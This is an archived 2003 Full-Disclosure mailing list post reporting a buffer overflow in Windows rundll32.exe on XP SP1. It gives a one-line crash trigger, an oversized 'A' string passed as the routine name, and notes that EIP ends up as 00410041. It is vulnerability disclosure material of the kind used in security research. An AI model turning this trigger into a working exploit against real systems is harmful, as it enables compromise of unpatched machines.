[Full-Disclosure] rundll32.exe buffer overflow

From: Rick (rikulat_private)
Date: Sun Jul 06 2003 - 11:26:58 PDT

Next message: Conectiva Updates: "[CLA-2003:685] Conectiva Security Announcement - openldap"

Previous message: Ory Segal: "[Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,
 
There is buffer overflow in rundll32.exe when it is passed big string as
routine name for a module. I've tested this on WindowsXP SP1. But other
version of windows might be vuln.  
 
rundll32.exe  advpack32.dll,<'A'x499>   
 
advpack32.dll is just example. Any executable/dll  will work. The
cmdline does get converted to UNICODE. And EIP ends up being 00410041. 
 
-
Rick Patel


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Conectiva Updates: "[CLA-2003:685] Conectiva Security Announcement - openldap"
Previous message: Ory Segal: "[Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jul 06 2003 - 12:54:11 PDT